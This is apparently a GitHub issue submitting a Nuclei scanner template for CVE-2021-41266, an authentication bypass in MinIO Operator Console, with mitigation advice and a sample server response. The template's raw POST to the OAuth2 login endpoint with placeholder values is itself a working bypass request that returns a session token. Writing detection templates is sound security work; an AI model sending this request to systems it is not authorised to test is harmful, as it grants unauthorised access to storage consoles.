### ISSUE TITLE
CVE-2021-41266 template

### ISSUE THREAD

**Issue by Alevsk** [projectdiscovery/nuclei-templates#3173]
### Template Information:

Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release `v0.12.2` and before are affected and are advised to update to `v0.12.3` or newer. Users unable to upgrade should add `automountServiceAccountToken: false` to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the `CONSOLE_IDP_URL`, `CONSOLE_IDP_CLIENT_ID`, `CONSOLE_IDP_SECRET` and `CONSOLE_IDP_CALLBACK` environment variable and instead use the Kubernetes service account token.

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36

### Nuclei Template:

```yaml
id: CVE-2021-41266

info:
  name: Authentication bypass issue in the Operator Console
  author: alevsk
  severity: critical
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-41266
    - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
  tags: cve,cve2021,minio,bypass,minio-operator,operator-console

requests:
  - raw:
      - |
        POST /api/v1/login/oauth2/auth HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"code":"test","state":"test"}
        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 201
          - 200
      - type: word
        words:
          - "sessionId"
        part: body
```

### Response:
```
HTTP/1.1 201 Created
Connection: close
Content-Length: 81
Content-Type: application/json
Date: Sat, 20 Nov 2021 08:55:30 GMT
Server: MinIO Console
Set-Cookie: token=REDACTED; Path=/; Expires=Sat, 20 Nov 2021 09:40:30 GMT; Max-Age=2700; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 1; mode=block

{"sessionId":"REDACTED"}
```
